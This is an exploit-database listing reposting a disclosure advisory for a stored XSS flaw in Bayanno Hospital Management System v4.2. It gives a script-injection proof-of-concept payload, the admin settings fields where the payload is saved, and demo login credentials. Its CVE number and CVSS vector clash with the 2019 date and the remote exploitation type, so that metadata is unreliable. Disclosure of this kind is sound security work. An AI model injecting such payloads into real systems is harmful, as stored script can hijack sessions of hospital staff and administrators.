Advertisement






Bayanno Hospital Management System v4.2 Stored XSS Injection

CVE Category Price Severity
CVE-2021-39669 CWE-79 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2019-04-23
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040205

Below is a copy:

Bayanno Hospital Management System v4.2 Stored XSS Injection
[*] :: Title: Bayanno Hospital Management System v4.2 Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-23
[*] :: Software: Bayanno Hospital Management System v4.2
  
[?] :: Technical Details & Description:
# Weak security measures like no input fields data filtering has been discovered in the Bayanno Hospital Management System. Current version of this web-application is 4.2.

[?] :: Demo Website:
# https://codecanyon.net/item/bayanno-hospital-management-system/5814621
# Frontend: http://creativeitem.com/demo/bayanno/
# Backend: http://creativeitem.com/demo/bayanno/index.php/login
# Login: [email protected], Password: 1234

[!] :: PoC Payload:
# "><script>alert('QUIXSS')</script>
# http://creativeitem.com/demo/bayanno/index.php/admin/dashboard

[+] :: PoC [Stored XSS Injection]:
# Authorize on the demo website for tests: http://creativeitem.com/demo/bayanno/index.php/login (login / password is [email protected] / 1234). Then go to the settings page: http://creativeitem.com/demo/bayanno/index.php/admin/system_settings and save your payload in the System Name and/or System Title input fields.
# Almost each input field is vulnerable for Stored XSS Injection.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum